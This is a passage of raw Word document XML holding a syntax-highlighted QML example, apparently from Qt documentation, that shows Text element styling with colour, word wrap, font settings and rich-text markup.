        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.3</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</w:t>
      </w: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id</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root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width</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>480</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height</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>320</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w: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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"#272822"</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width</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>480</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height</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>320</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Column</w:t>
      </w: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spacing</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>20</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w: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text</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'I am the very model of a modern major general!'</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// color can be set on the entire element with this property</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"yellow"</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w: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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// For text to wrap, a width has to be explicitly provided</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width</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root</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width</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// This setting makes the text wrap at word boundaries when it goes past the width of the Text object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wrapMode</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WordWrap</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// You can use \ to escape quotation marks, or to add new lines (\n). Use \\ to get a \ in the string</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            text</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'I am the very model of a modern major general. I\'ve information vegetable, animal and mineral. I know the kings of england and I quote the fights historical; from Marathon to Waterloo in order categorical.'</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// color can be set on the entire element with this property</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"white"</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w: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text</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'I am the very model of a modern major general!'</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// color can be set on the entire element with this property</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"yellow"</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// font properties can be set effciently on the whole string at once</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font </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family</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'Courier'</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pixelSize</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>20</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italic</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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capitalization</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Font</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SmallCaps</w:t>
      </w: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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// HTML like markup can also be used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00C21832" w:rsidRDefault="00305129" w:rsidP="00305129">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'&lt;font color="white"&gt;I am the &lt;b&gt;very&lt;/b&gt; model of a modern &lt;i&gt;major general&lt;/i&gt;!&lt;/font&gt;'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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// This could also be written font { pointSize: 14 }. Both syntaxes are valid.</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font</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pointSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>14</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5129">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// StyledText format supports fewer tags, but is more efficient than RichText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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>textFormat</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>StyledText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rPr>
      </w:pP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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00305129" w:rsidRDefault="00305129" w:rsidP="00305129">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRPr="00305129" w:rsidRDefault="00305129" w:rsidP="00305129">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00305129" w:rsidRDefault="00305129" w:rsidP="00305129">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/qml-uses-text.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00305129">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
